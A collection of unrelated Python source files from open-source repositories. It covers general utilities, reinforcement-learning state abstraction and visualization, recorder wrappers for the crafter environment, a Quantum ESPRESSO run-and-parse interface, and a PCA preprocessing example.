""" Equivalent to `item if item is not None else default` """
if item is None:
return default
else:
return item
class MLStripper(HTMLParser):
""" Strips markup language tags from a string.
FROM http://stackoverflow.com/a/925630/1958900
"""
def __init__(self):
if not future.utils.PY2:
super().__init__()
self.reset()
self.fed = []
self.strict = False
self.convert_charrefs = True
def handle_data(self, d):
self.fed.append(d)
def get_data(self):
return ''.join(self.fed)
def html_to_text(html):
"""
FROM http://stackoverflow.com/a/925630/1958900
"""
s = MLStripper()
s.unescape = True # convert HTML entities to text
s.feed(html)
return s.get_data()
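# Illustrative example: html_to_text('<p>Hello <b>world</b></p>') is expected to
# return 'Hello world' (tags stripped, text preserved).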
def printflush(s, newline=True):
if newline:
print(s)
else:
print(s, end=' ')
sys.stdout.flush()
def which(cmd, mode=os.F_OK | os.X_OK, path=None):
"""Given a command, mode, and a PATH string, return the path which
conforms to the given mode on the PATH, or None if there is no such
file.
`mode` defaults to os.F_OK | os.X_OK. `path` defaults to the result
of os.environ.get("PATH"), or can be overridden with a custom search
path.
Note:
        Copied without modification from Python 3.6.1 ``shutil.which``
source code
"""
# Check that a given file can be accessed with the correct mode.
# Additionally check that `file` is not a directory, as on Windows
# directories pass the os.access check.
def _access_check(fn, mode):
return (os.path.exists(fn) and os.access(fn, mode)
and not os.path.isdir(fn))
# If we're given a path with a directory part, look it up directly rather
# than referring to PATH directories. This includes checking relative to the
# current directory, e.g. ./script
if os.path.dirname(cmd):
if _access_check(cmd, mode):
return cmd
return None
if path is None:
path = os.environ.get("PATH", os.defpath)
if not path:
return None
path = path.split(os.pathsep)
if sys.platform == "win32":
# The current directory takes precedence on Windows.
if not os.curdir in path:
path.insert(0, os.curdir)
# PATHEXT is necessary to check on Windows.
pathext = os.environ.get("PATHEXT", "").split(os.pathsep)
# See if the given file matches any of the expected path extensions.
# This will allow us to short circuit when given "python.exe".
# If it does match, only test that one, otherwise we have to try
# others.
if any(cmd.lower().endswith(ext.lower()) for ext in pathext):
files = [cmd]
else:
files = [cmd + ext for ext in pathext]
else:
# On other platforms you don't have things like PATHEXT to tell you
# what file suffixes are executable, so just pass on cmd as-is.
files = [cmd]
seen = set()
for dir in path:
normdir = os.path.normcase(dir)
if not normdir in seen:
seen.add(normdir)
for thefile in files:
name = os.path.join(dir, thefile)
if _access_check(name, mode):
return name
return None
class methodcaller(object):
"""The pickleable implementation of the standard library operator.methodcaller.
This was copied without modification from:
https://github.com/python/cpython/blob/065990fa5bd30fb3ca61b90adebc7d8cb3f16b5a/Lib/operator.py
The c-extension version is not pickleable, so we keep a copy of the pure-python standard library
code here. See https://bugs.python.org/issue22955
Original documentation:
Return a callable object that calls the given method on its operand.
After f = methodcaller('name'), the call f(r) returns r.name().
After g = methodcaller('name', 'date', foo=1), the call g(r) returns
r.name('date', foo=1).
"""
__slots__ = ('_name', '_args', '_kwargs')
def __init__(*args, **kwargs):
if len(args) < 2:
msg = "methodcaller needs at least one argument, the method name"
raise TypeError(msg)
self = args[0]
self._name = args[1]
if not isinstance(self._name, future.utils.native_str):
raise TypeError('method name must be a string')
self._args = args[2:]
self._kwargs = kwargs
def __call__(self, obj):
return getattr(obj, self._name)(*self._args, **self._kwargs)
def __repr__(self):
args = [repr(self._name)]
args.extend(list(map(repr, self._args)))
args.extend('%s=%r' % (k, v) for k, v in list(self._kwargs.items()))
return '%s.%s(%s)' % (self.__class__.__module__,
self.__class__.__name__,
', '.join(args))
def __reduce__(self):
if not self._kwargs:
return self.__class__, (self._name,) + self._args
else:
from functools import partial
return partial(self.__class__, self._name, **self._kwargs), self._args
class textnotify(object):
""" Print a single, immediately flushed line to log the execution of a block.
Prints 'done' at the end of the line (or 'ERROR' if an uncaught exception)
Examples:
>>> import time
>>> with textnotify('starting to sleep'):
>>> time.sleep(3)
starting to sleep...done
>>> with textnotify('raising an exception...'):
>>> raise ValueError()
raising an exception...error
ValueError [...]
"""
def __init__(self, startmsg):
if startmsg.strip()[-3:] != '...':
startmsg = startmsg.strip() + '...'
self.startmsg = startmsg
def __enter__(self):
printflush(self.startmsg, newline=False)
def __exit__(self, exc_type, exc_val, exc_tb):
if exc_type is None:
printflush('done')
else:
printflush('ERROR')
class BaseTable(object):
def __init__(self, categories, fileobj=None):
self.categories = categories
self.lines = []
self.fileobj = fileobj
def add_line(self, obj):
if hasattr(obj, 'keys'):
newline = [obj.get(cat, '') for cat in self.categories]
else:
assert len(obj) == len(self.categories)
newline = obj
self.lines.append(newline)
self.writeline(newline)
def writeline(self, newline):
raise NotImplementedError()
def getstring(self):
raise NotImplementedError()
class MarkdownTable(BaseTable):
def __init__(self, *categories):
super().__init__(categories)
def markdown(self, replace=None):
if replace is None: replace = {}
outlines = ['| ' + ' | '.join(self.categories) + ' |',
'|-' + ''.join('|-' for x in self.categories) + '|']
for line in self.lines:
nextline = [str(replace.get(val, val)) for val in line]
outlines.append('| ' + ' | '.join(nextline) + ' |')
return '\n'.join(outlines)
def writeline(self, newline):
pass
def getstring(self):
return self.markdown()
def binomial_coefficient(n, k):
# credit to http://stackoverflow.com/users/226086/nas-banov
return int(reduce(operator.mul,
(fractions.Fraction(n - i, i + 1) for i in range(k)), 1))
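# Quick sanity check (illustrative): binomial_coefficient(5, 2) == 10 and
# binomial_coefficient(4, 0) == 1, matching n! / (k! * (n - k)!).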
def pairwise_displacements(a):
"""
:type a: numpy.array
from http://stackoverflow.com/questions/22390418/pairwise-displacement-vectors-among-set-of-points
"""
import numpy as np
n = a.shape[0]
d = a.shape[1]
c = binomial_coefficient(n, 2)
out = np.zeros((c, d))
l = 0
r = l + n - 1
for sl in range(1, n): # no point1 - point1!
out[l:r] = a[:n - sl] - a[sl:]
l = r
r += n - (sl + 1)
return out
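# Illustrative example: for 3 points in 2D there are C(3, 2) = 3 unordered pairs,
# so the output has shape (3, 2). Assumes numpy is available (it is imported
# inside the function).
#
#   a = np.array([[0.0, 0.0], [1.0, 0.0], [1.0, 1.0]])
#   pairwise_displacements(a).shape  # -> (3, 2)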
def is_printable(s):
import string
for c in s:
if c not in string.printable:
return False
else:
return True
class _RedirectStream(object):
"""From python3.4 stdlib
"""
_stream = None
def __init__(self, new_target):
self._new_target = new_target
# We use a list of old targets to make this CM re-entrant
self._old_targets = []
def __enter__(self):
self._old_targets.append(getattr(sys, self._stream))
setattr(sys, self._stream, self._new_target)
return self._new_target
def __exit__(self, exctype, excinst, exctb):
setattr(sys, self._stream, self._old_targets.pop())
class redirect_stderr(_RedirectStream):
"""From python3.4 stdlib"""
_stream = "stderr"
GETFLOAT = re.compile(r'-?\d+(\.\d+)?(e[-+]?\d+)?')  # matches numbers, e.g. 1, -2.0, 3.5e50, 0.001e-10
def from_filepath(func, filelike):
"""Run func on a temporary *path* assigned to filelike"""
if type(filelike) == str:
return func(filelike)
else:
with tempfile.NamedTemporaryFile() as outfile:
outfile.write(filelike.read().encode()) # hack - prob need to detect bytes
outfile.flush()
result = func(outfile.name)
return result
|
simple_rl/abstraction/state_abs/sa_helpers.py
|
david-abel/mdps
| 230 |
129418
|
<reponame>david-abel/mdps
# Python imports.
from __future__ import print_function
from collections import defaultdict
import sys
import random
import itertools
# Other imports.
from simple_rl.planning.ValueIterationClass import ValueIteration
from simple_rl.mdp import State
from simple_rl.mdp import MDPDistribution
from simple_rl.abstraction.state_abs import indicator_funcs as ind_funcs
from simple_rl.abstraction.state_abs.StateAbstractionClass import StateAbstraction
def merge_state_abstr(list_of_state_abstr, states):
'''
Args:
list_of_state_abstr (list)
states (list)
Returns:
(simple_rl.StateAbstraction)
Summary:
Merges all state abstractions in @list_of_state_abstr by taking the
intersection over safe clusterability.
'''
safe_state_pairings = defaultdict(list)
# For each state pair...
for s_1, s_2 in itertools.product(states, repeat=2):
safely_clustered_pair = True
for state_abstr in list_of_state_abstr:
if state_abstr.phi(s_1) != state_abstr.phi(s_2):
safely_clustered_pair = False
break
if safely_clustered_pair:
safe_state_pairings[s_1] += [s_2]
safe_state_pairings[s_2] += [s_1]
# Now we have a dict of safe state pairs, merge them.
phi = defaultdict(list)
cluster_counter = 0
for state in safe_state_pairings.keys():
for safe_other_state in safe_state_pairings[state]:
if state not in phi.keys() and safe_other_state not in phi.keys():
phi[state] = State(cluster_counter)
phi[safe_other_state] = State(cluster_counter)
elif state in phi.keys():
phi[safe_other_state] = phi[state]
elif safe_other_state in phi.keys():
phi[state] = phi[safe_other_state]
# Increment counter
cluster_counter += 1
return StateAbstraction(phi, states)
def make_sa(mdp, indic_func=ind_funcs._q_eps_approx_indicator, state_class=State, epsilon=0.0, save=False, track_act_opt_pr=False):
'''
Args:
mdp (MDP)
state_class (Class)
epsilon (float)
Summary:
Creates and saves a state abstraction.
'''
print(" Making state abstraction... ")
q_equiv_sa = StateAbstraction(phi={}, track_act_opt_pr=track_act_opt_pr)
if isinstance(mdp, MDPDistribution):
q_equiv_sa = make_multitask_sa(mdp, state_class=state_class, indic_func=indic_func, epsilon=epsilon, track_act_opt_pr=track_act_opt_pr)
else:
q_equiv_sa = make_singletask_sa(mdp, state_class=state_class, indic_func=indic_func, epsilon=epsilon, track_act_opt_pr=track_act_opt_pr)
if save:
save_sa(q_equiv_sa, str(mdp) + ".p")
return q_equiv_sa
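# Illustrative usage sketch (assumes a GridWorldMDP from simple_rl.tasks, which is
# not imported in this module):
#
#   from simple_rl.tasks import GridWorldMDP
#   mdp = GridWorldMDP(width=4, height=3)
#   sa = make_sa(mdp, epsilon=0.05)
#   print(sa.get_num_abstr_states())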
def make_multitask_sa(mdp_distr, state_class=State, indic_func=ind_funcs._q_eps_approx_indicator, epsilon=0.0, aa_single_act=True, track_act_opt_pr=False):
'''
Args:
mdp_distr (MDPDistribution)
state_class (Class)
indicator_func (S x S --> {0,1})
epsilon (float)
aa_single_act (bool): If we should track optimal actions.
Returns:
(StateAbstraction)
'''
sa_list = []
for mdp in mdp_distr.get_mdps():
sa = make_singletask_sa(mdp, indic_func, state_class, epsilon, aa_single_act=aa_single_act, prob_of_mdp=mdp_distr.get_prob_of_mdp(mdp), track_act_opt_pr=track_act_opt_pr)
sa_list += [sa]
mdp = mdp_distr.get_all_mdps()[0]
vi = ValueIteration(mdp)
ground_states = vi.get_states()
multitask_sa = merge_state_abstr(sa_list, ground_states)
return multitask_sa
def make_singletask_sa(mdp, indic_func, state_class, epsilon=0.0, aa_single_act=False, prob_of_mdp=1.0, track_act_opt_pr=False):
'''
Args:
mdp (MDP)
indic_func (S x S --> {0,1})
state_class (Class)
epsilon (float)
Returns:
(StateAbstraction)
'''
print("\tRunning VI...",)
sys.stdout.flush()
# Run VI
if isinstance(mdp, MDPDistribution):
mdp = mdp.sample()
vi = ValueIteration(mdp)
iters, val = vi.run_vi()
print(" done.")
print("\tMaking state abstraction...",)
sys.stdout.flush()
sa = StateAbstraction(phi={}, state_class=state_class, track_act_opt_pr=track_act_opt_pr)
clusters = defaultdict(list)
num_states = len(vi.get_states())
actions = mdp.get_actions()
# Find state pairs that satisfy the condition.
for i, state_x in enumerate(vi.get_states()):
sys.stdout.flush()
clusters[state_x] = [state_x]
for state_y in vi.get_states()[i:]:
if not (state_x == state_y) and indic_func(state_x, state_y, vi, actions, epsilon=epsilon):
clusters[state_x].append(state_y)
clusters[state_y].append(state_x)
print("making clusters...",)
sys.stdout.flush()
# Build SA.
for i, state in enumerate(clusters.keys()):
new_cluster = clusters[state]
sa.make_cluster(new_cluster)
# Destroy old so we don't double up.
for s in clusters[state]:
if s in clusters.keys():
clusters.pop(s)
if aa_single_act:
# Put all optimal actions in a set associated with the ground state.
for ground_s in sa.get_ground_states():
a_star_set = set(vi.get_max_q_actions(ground_s))
sa.set_actions_state_opt_dict(ground_s, a_star_set, prob_of_mdp)
print(" done.")
print("\tGround States:", num_states)
print("\tAbstract:", sa.get_num_abstr_states())
print()
return sa
def visualize_state_abstr_grid(grid_mdp, state_abstr, scr_width=720, scr_height=720):
'''
Args:
grid_mdp (GridWorldMDP)
state_abstr (StateAbstraction)
Summary:
Visualizes the state abstraction.
'''
import pygame
from simple_rl.utils import mdp_visualizer
pygame.init()
title_font = pygame.font.SysFont("CMU Serif", 32)
small_font = pygame.font.SysFont("CMU Serif", 22)
if isinstance(grid_mdp, MDPDistribution):
goal_locs = set([])
for m in grid_mdp.get_all_mdps():
for g in m.get_goal_locs():
goal_locs.add(g)
grid_mdp = grid_mdp.sample()
else:
goal_locs = grid_mdp.get_goal_locs()
# Pygame init.
screen = pygame.display.set_mode((scr_width, scr_height))
pygame.init()
screen.fill((255, 255, 255))
pygame.display.update()
mdp_visualizer._draw_title_text(grid_mdp, screen)
# Prep some dimensions to make drawing easier.
scr_width, scr_height = screen.get_width(), screen.get_height()
width_buffer = scr_width / 10.0
height_buffer = 30 + (scr_height / 10.0) # Add 30 for title.
cell_width = (scr_width - width_buffer * 2) / grid_mdp.width
cell_height = (scr_height - height_buffer * 2) / grid_mdp.height
font_size = int(min(cell_width, cell_height) / 4.0)
reg_font = pygame.font.SysFont("CMU Serif", font_size)
cc_font = pygame.font.SysFont("Courier", font_size*2 + 2)
# Setup states to compute abstr states later.
state_dict = defaultdict(lambda : defaultdict(bool))
for s in state_abstr.get_ground_states():
state_dict[s.x][s.y] = s
# Grab colors.
from simple_rl.utils.chart_utils import color_ls
sa_colors = color_ls
abstr_states = state_abstr.get_abs_states()
non_singleton_abstr_states = [s_phi for s_phi in abstr_states if len(state_abstr.get_ground_states_in_abs_state(s_phi)) > 1]
new_color_index = 0
while len(non_singleton_abstr_states) > len(sa_colors):
next_new_color_variant = color_ls[new_color_index]
rand_color = [min(max(color_channel + random.randint(-30,30), 0), 255) for color_channel in next_new_color_variant]
sa_colors.append(rand_color)
new_color_index += 1
color_index = 0
abstr_state_color_dict = {}
# For each row:
for i in range(grid_mdp.width):
# For each column:
for j in range(grid_mdp.height):
if not state_dict[i+1][grid_mdp.height - j]:
# An unreachable state.
continue
# Draw the abstract state colors.
top_left_point = width_buffer + cell_width*i, height_buffer + cell_height*j
s = state_dict[i+1][grid_mdp.height - j]
abs_state = state_abstr.phi(s)
cluster_num = abs_state.data
is_singleton = abs_state not in non_singleton_abstr_states
# Grab next color if we haven't assigned a color yet.
if not is_singleton and abs_state.data not in abstr_state_color_dict.keys():
abstr_state_color_dict[abs_state.data] = color_index
color_index += 1
r = pygame.draw.rect(screen, (46, 49, 49), top_left_point + (cell_width, cell_height), 3)
if not is_singleton:
abstr_state_color = sa_colors[abstr_state_color_dict[abs_state.data] % len(sa_colors)]
r = pygame.draw.rect(screen, abstr_state_color, (top_left_point[0] + 5, top_left_point[1] + 5) + (cell_width-10, cell_height-10), 0)
# else:
# top_left_point = width_buffer + cell_width*i, height_buffer + cell_height*j
# r = pygame.draw.rect(screen, (46, 49, 49), top_left_point + (cell_width, cell_height), 3)
if grid_mdp.is_wall(i+1, grid_mdp.height - j):
# Draw the walls.
top_left_point = width_buffer + cell_width*i + 5, height_buffer + cell_height*j + 5
r = pygame.draw.rect(screen, (255, 255, 255), top_left_point + (cell_width-10, cell_height-10), 0)
text = reg_font.render("(wall)", True, (46, 49, 49))
screen.blit(text, (top_left_point[0] + 10, top_left_point[1] + 20))
if (i + 1, grid_mdp.height - j) in goal_locs:
# Draw goal.
circle_center = int(top_left_point[0] + cell_width/2.0), int(top_left_point[1] + cell_height/2.0)
circler_color = (154, 195, 157)
pygame.draw.circle(screen, circler_color, circle_center, int(min(cell_width, cell_height) / 3.0))
# Goal text.
text = reg_font.render("Goal", True, (46, 49, 49))
offset = int(min(cell_width, cell_height) / 3.0)
goal_text_point = circle_center[0] - font_size, circle_center[1] - font_size/1.5
screen.blit(text, goal_text_point)
pygame.display.flip()
raw_input("Press enter to exit: ")
|
crafter/recorder.py
|
kachayev/crafter
| 161 |
129424
|
<reponame>kachayev/crafter
import datetime
import json
import pathlib
import imageio
import numpy as np
class Recorder:
def __init__(
self, env, directory, save_stats=True, save_video=True,
save_episode=True, video_size=(512, 512)):
if directory and save_stats:
env = StatsRecorder(env, directory)
if directory and save_video:
env = VideoRecorder(env, directory, video_size)
if directory and save_episode:
env = EpisodeRecorder(env, directory)
self._env = env
def __getattr__(self, name):
if name.startswith('__'):
raise AttributeError(name)
return getattr(self._env, name)
class StatsRecorder:
def __init__(self, env, directory):
self._env = env
self._directory = pathlib.Path(directory).expanduser()
self._directory.mkdir(exist_ok=True, parents=True)
self._file = (self._directory / 'stats.jsonl').open('a')
self._length = None
self._reward = None
self._unlocked = None
self._stats = None
def __getattr__(self, name):
if name.startswith('__'):
raise AttributeError(name)
return getattr(self._env, name)
def reset(self):
obs = self._env.reset()
self._length = 0
self._reward = 0
self._unlocked = None
self._stats = None
return obs
def step(self, action):
obs, reward, done, info = self._env.step(action)
self._length += 1
self._reward += info['reward']
if done:
self._stats = {'length': self._length, 'reward': round(self._reward, 1)}
for key, value in info['achievements'].items():
self._stats[f'achievement_{key}'] = value
self._save()
return obs, reward, done, info
def _save(self):
self._file.write(json.dumps(self._stats) + '\n')
self._file.flush()
class VideoRecorder:
def __init__(self, env, directory, size=(512, 512)):
if not hasattr(env, 'episode_name'):
env = EpisodeName(env)
self._env = env
self._directory = pathlib.Path(directory).expanduser()
self._directory.mkdir(exist_ok=True, parents=True)
self._size = size
self._frames = None
def __getattr__(self, name):
if name.startswith('__'):
raise AttributeError(name)
return getattr(self._env, name)
def reset(self):
obs = self._env.reset()
self._frames = [self._env.render(self._size)]
return obs
def step(self, action):
obs, reward, done, info = self._env.step(action)
self._frames.append(self._env.render(self._size))
if done:
self._save()
return obs, reward, done, info
def _save(self):
filename = str(self._directory / (self._env.episode_name + '.mp4'))
imageio.mimsave(filename, self._frames)
class EpisodeRecorder:
def __init__(self, env, directory):
if not hasattr(env, 'episode_name'):
env = EpisodeName(env)
self._env = env
self._directory = pathlib.Path(directory).expanduser()
self._directory.mkdir(exist_ok=True, parents=True)
self._episode = None
def __getattr__(self, name):
if name.startswith('__'):
raise AttributeError(name)
return getattr(self._env, name)
def reset(self):
obs = self._env.reset()
self._episode = [{'image': obs}]
return obs
def step(self, action):
# Transitions are defined from the environment perspective, meaning that a
# transition contains the action and the resulting reward and next
# observation produced by the environment in response to said action.
obs, reward, done, info = self._env.step(action)
transition = {
'action': action, 'image': obs, 'reward': reward, 'done': done,
}
for key, value in info.items():
if key in ('inventory', 'achievements'):
continue
transition[key] = value
for key, value in info['achievements'].items():
transition[f'achievement_{key}'] = value
for key, value in info['inventory'].items():
transition[f'ainventory_{key}'] = value
self._episode.append(transition)
if done:
self._save()
return obs, reward, done, info
def _save(self):
filename = str(self._directory / (self._env.episode_name + '.npz'))
# Fill in zeros for keys missing at the first time step.
for key, value in self._episode[1].items():
if key not in self._episode[0]:
self._episode[0][key] = np.zeros_like(value)
episode = {
k: np.array([step[k] for step in self._episode])
for k in self._episode[0]}
np.savez_compressed(filename, **episode)
class EpisodeName:
def __init__(self, env):
self._env = env
self._timestamp = None
self._unlocked = None
self._length = None
def __getattr__(self, name):
if name.startswith('__'):
raise AttributeError(name)
return getattr(self._env, name)
def reset(self):
obs = self._env.reset()
self._timestamp = None
self._unlocked = None
self._length = 0
return obs
def step(self, action):
obs, reward, done, info = self._env.step(action)
self._length += 1
if done:
self._timestamp = datetime.datetime.now().strftime('%Y%m%dT%H%M%S')
self._unlocked = sum(int(v >= 1) for v in info['achievements'].values())
return obs, reward, done, info
@property
def episode_name(self):
return f'{self._timestamp}-ach{self._unlocked}-len{self._length}'
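

# --- Hedged usage sketch (not part of the original module) ---
# Shows how the Recorder wrapper might be driven end to end. `crafter.Env()`
# and the 'logdir' directory are illustrative assumptions; any Gym-style
# environment exposing reset/step, an `action_space` with `sample()`, and
# `info['reward']`/`info['achievements']` would work the same way.
if __name__ == '__main__':
    import crafter
    env = crafter.Env()
    env = Recorder(env, 'logdir', save_video=False, save_episode=False)
    obs = env.reset()
    done = False
    while not done:
        # Random policy, purely for demonstration; stats land in logdir/stats.jsonl.
        obs, reward, done, info = env.step(env.action_space.sample())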
|
flare/dft_interface/qe_util.py
|
aaronchen0316/flare
| 144 |
129437
|
"""
This module is used to call Quantum Espresso simulation and parse its output
The user need to supply a complete input script with single-point scf
calculation, CELL_PARAMETERS, ATOMIC_POSITIONS, nat, ATOMIC_SPECIES
arguments. It is case sensitive. and the nat line should be the first
argument of the line it appears. The user can also opt to the ASE interface instead.
This module will copy the input template to a new file with "_run" suffix,
edit the atomic coordination in the ATOMIC_POSITIONS block and run the similation with the parallel set up given.
"""
import os
from subprocess import call
import time
import numpy as np
from flare import struc
from typing import List
name = "QE"
def run_dft_par(
dft_input,
structure,
dft_loc,
n_cpus=1,
dft_out="pwscf.out",
npool=None,
mpi="mpi",
**dft_kwargs,
):
"""run DFT calculation with given input template
and atomic configurations. if n_cpus == 1, it executes serial run.
:param dft_input: input template file name
:param structure: atomic configuration
:param dft_loc: relative/absolute executable of the DFT code
:param n_cpus: # of CPU for mpi
:param dft_out: output file name
:param npool: not used
:param mpi: not used
:param **dft_wargs: not used
:return: forces
"""
newfilename = edit_dft_input_positions(dft_input, structure)
if npool is None:
dft_command = f"{dft_loc} -i {newfilename}"
else:
dft_command = f"{dft_loc} -nk {npool} -i {newfilename}"
if n_cpus > 1:
if mpi == "mpi":
dft_command = f"mpirun -np {n_cpus} {dft_command}"
else:
dft_command = f"srun -n {n_cpus} --mpi=pmi2 {dft_command}"
with open(dft_out, "w+") as fout:
call(dft_command.split(), stdout=fout)
os.remove(newfilename)
return parse_dft_forces(dft_out)
def run_dft_en_par(dft_input, structure, dft_loc, n_cpus):
"""run DFT calculation with given input template
and atomic configurations. This function is not used atm
if n_cpus == 1, it executes serial run.
:param dft_input: input template file name
:param structure: atomic configuration
:param dft_loc: relative/absolute executable of the DFT code
:param n_cpus: # of CPU for mpi
:param dft_out: output file name
:param npool: not used
:param mpi: not used
:param **dft_wargs: not used
:return: forces, energy
"""
    run_qe_path = edit_dft_input_positions(dft_input, structure)
    qe_command = f"mpirun -np {n_cpus} {dft_loc} -i {run_qe_path}"
with open("pwscf.out", "w+") as fout:
call(qe_command.split(), stdout=fout)
forces, energy = parse_dft_forces_and_energy("pwscf.out")
return forces, energy
def run_dft_en_npool(qe_input, structure, dft_loc, npool):
    run_qe_path = edit_dft_input_positions(qe_input, structure)
qe_command = "mpirun {0} -npool {1} < {2} > {3}".format(
dft_loc, npool, run_qe_path, "pwscf.out"
)
call(qe_command, shell=True)
forces, energy = parse_dft_forces_and_energy("pwscf.out")
return forces, energy
def parse_dft_input(dft_input: str):
"""parse the input to get information of atomic configuration
:param dft_input: input file name
:return: positions, species, cell, masses
"""
positions = []
species = []
cell = []
with open(dft_input) as f:
lines = f.readlines()
# Find the cell and positions in the output file
cell_index = None
positions_index = None
nat = None
species_index = None
for i, line in enumerate(lines):
if "CELL_PARAMETERS" in line:
cell_index = int(i + 1)
if "ATOMIC_POSITIONS" in line:
positions_index = int(i + 1)
if "nat" in line:
nat = int(line.split("=")[1])
if "ATOMIC_SPECIES" in line:
species_index = int(i + 1)
assert cell_index is not None, "Failed to find cell in input"
assert positions_index is not None, "Failed to find positions in input"
assert nat is not None, "Failed to find number of atoms in input"
assert species_index is not None, "Failed to find atomic species in input"
# Load cell
for i in range(cell_index, cell_index + 3):
cell_line = lines[i].strip()
cell.append(np.fromstring(cell_line, sep=" "))
cell = np.array(cell)
# Check cell IO
assert len(cell) != 0, "Cell failed to load"
assert np.shape(cell) == (3, 3), "Cell failed to load correctly"
# Load positions
for i in range(positions_index, positions_index + nat):
line_string = lines[i].strip().split()
species.append(line_string[0])
pos_string = " ".join(line_string[1:4])
positions.append(np.fromstring(pos_string, sep=" "))
# Check position IO
assert positions != [], "Positions failed to load"
positions = np.array(positions)
# see conversions.nb for conversion from amu to md units
massconvert = 0.000103642695727
masses = {}
for i in range(species_index, species_index + len(set(species))):
# Expects lines of format like: H 1.0 H_pseudo_name.ext
line = lines[i].strip().split()
masses[line[0]] = float(line[1]) * massconvert
return positions, species, cell, masses
def dft_input_to_structure(dft_input: str):
"""Parses a qe input and returns the atoms in the
file as a Structure object
:param dft_input: QE Input file to parse
:return: class Structure
"""
positions, species, cell, masses = parse_dft_input(dft_input)
_, coded_species = struc.get_unique_species(species)
return struc.Structure(
positions=positions,
species=coded_species,
cell=cell,
mass_dict=masses,
species_labels=species,
)
def edit_dft_input_positions(dft_input: str, structure):
"""
Write the current configuration of the OTF structure to the
qe input file
:param dft_input: dft input file name
:param structure: atomic structure to compute
:return: the name of the edited file
"""
with open(dft_input, "r") as f:
lines = f.readlines()
file_pos_index = None
cell_index = None
nat = None
for i, line in enumerate(lines):
if "ATOMIC_POSITIONS" in line:
file_pos_index = int(i + 1)
if "CELL_PARAMETERS" in line:
cell_index = int(i + 1)
# Load nat into variable then overwrite it with new nat
if "nat" in line:
nat = int(line.split("=")[1])
nat_index = int(i)
lines[nat_index] = "nat = " + str(structure.nat) + "\n"
assert file_pos_index is not None, "Failed to find positions in input"
assert cell_index is not None, "Failed to find cell in input"
assert nat is not None, "Failed to find nat in input"
# TODO Catch case where the punchout structure has more atoms than the
# original structure
for pos_index, line_index in enumerate(
range(file_pos_index, file_pos_index + structure.nat)
):
pos_string = " ".join(
[
structure.species_labels[pos_index],
str(structure.positions[pos_index][0]),
str(structure.positions[pos_index][1]),
str(structure.positions[pos_index][2]),
]
)
if line_index < len(lines):
lines[line_index] = str(pos_string + "\n")
else:
lines.append(str(pos_string + "\n"))
# TODO current assumption: if there is a new structure, then the new
# structure has fewer atoms than the previous one. If we are always
# 'editing' a version of the larger structure than this will be okay with
# the punchout method.
for line_index in range(file_pos_index + structure.nat, file_pos_index + nat):
lines[line_index] = ""
lines[cell_index] = " ".join([str(x) for x in structure.vec1]) + "\n"
lines[cell_index + 1] = " ".join([str(x) for x in structure.vec2]) + "\n"
lines[cell_index + 2] = " ".join([str(x) for x in structure.vec3]) + "\n"
newfilename = dft_input + "_run"
with open(newfilename, "w") as f:
for line in lines:
f.write(line)
return newfilename
def parse_dft_forces(outfile: str):
"""
Get forces from a pwscf file in eV/A
:param outfile: str, Path to pwscf output file
:return: list[nparray] , List of forces acting on atoms
"""
forces = []
total_energy = np.nan
with open(outfile, "r") as outf:
for line in outf:
if line.lower().startswith("! total energy"):
total_energy = float(line.split()[-2])
if line.find("force") != -1 and line.find("atom") != -1:
line = line.split("force =")[-1]
line = line.strip()
line = line.split(" ")
line = [x for x in line if x != ""]
temp_forces = []
for x in line:
temp_forces.append(float(x))
forces.append(np.array(list(temp_forces)))
    assert not np.isnan(
        total_energy
    ), "Quantum ESPRESSO parser failed to read the file {}. Run failed.".format(outfile)
# Convert from ry/au to ev/angstrom
conversion_factor = 25.71104309541616
forces = [conversion_factor * force for force in forces]
forces = np.array(forces)
return forces
def parse_dft_forces_and_energy(outfile: str):
"""
    Get forces (in eV/A) and the total energy from a pwscf output file

    :param outfile: str, Path to pwscf output file
    :return: (forces, total_energy), where forces is a list of numpy arrays
"""
forces = []
total_energy = np.nan
with open(outfile, "r") as outf:
for line in outf:
if line.lower().startswith("! total energy"):
total_energy = float(line.split()[-2])
if line.find("force") != -1 and line.find("atom") != -1:
line = line.split("force =")[-1]
line = line.strip()
line = line.split(" ")
line = [x for x in line if x != ""]
temp_forces = []
for x in line:
temp_forces.append(float(x))
forces.append(np.array(list(temp_forces)))
    assert not np.isnan(
        total_energy
    ), "Quantum ESPRESSO parser failed to read the file {}. Run failed.".format(outfile)
# Convert from ry/au to ev/angstrom
conversion_factor = 25.71104309541616
forces = [conversion_factor * force for force in forces]
forces = np.array(forces)
return forces, total_energy
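

# --- Hedged usage sketch (not part of the original module) ---
# Minimal example of how this module might be driven. The template name
# "pwscf.in" and the executable "pw.x" are illustrative assumptions; any
# complete single-point scf input and QE binary on the PATH would do.
if __name__ == "__main__":
    structure = dft_input_to_structure("pwscf.in")
    forces = run_dft_par("pwscf.in", structure, "pw.x", n_cpus=4, dft_out="pwscf.out")
    print(forces)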
|
ch03/ch03-05-reduction.py
|
makinzm/kagglebook
| 470 |
129441
|
<gh_stars>100-1000
# ---------------------------------
# Preparation of data etc.
# ----------------------------------
import numpy as np
import pandas as pd
# train_x is the training data, train_y is the target variable, test_x is the test data
# They are held as pandas DataFrames / Series (sometimes as numpy arrays)
train = pd.read_csv('../input/sample-data/train_preprocessed_onehot.csv')
train_x = train.drop(['target'], axis=1)
train_y = train['target']
test_x = pd.read_csv('../input/sample-data/test_preprocessed_onehot.csv')
# Keep the original training and test data around for the explanations below
train_x_saved = train_x.copy()
test_x_saved = test_x.copy()
from sklearn.preprocessing import StandardScaler, MinMaxScaler
# Function that returns standardized training and test data
def load_standarized_data():
train_x, test_x = train_x_saved.copy(), test_x_saved.copy()
scaler = StandardScaler()
scaler.fit(train_x)
train_x = scaler.transform(train_x)
test_x = scaler.transform(test_x)
return pd.DataFrame(train_x), pd.DataFrame(test_x)
# Function that returns Min-Max scaled training and test data
def load_minmax_scaled_data():
train_x, test_x = train_x_saved.copy(), test_x_saved.copy()
    # Perform Min-Max scaling
scaler = MinMaxScaler()
scaler.fit(pd.concat([train_x, test_x], axis=0))
train_x = scaler.transform(train_x)
test_x = scaler.transform(test_x)
return pd.DataFrame(train_x), pd.DataFrame(test_x)
# -----------------------------------
# PCA
# -----------------------------------
# Use standardized data
train_x, test_x = load_standarized_data()
# -----------------------------------
# PCA
from sklearn.decomposition import PCA
# The data is assumed to have been preprocessed so that scales are aligned (e.g. standardized)
# Define the PCA transformation based on the training data
pca = PCA(n_components=5)
pca.fit(train_x)
# Apply the transformation
train_x = pca.transform(train_x)
test_x = pca.transform(test_x)
# -----------------------------------
# Use standardized data
train_x, test_x = load_standarized_data()
# -----------------------------------
# TruncatedSVD
from sklearn.decomposition import TruncatedSVD
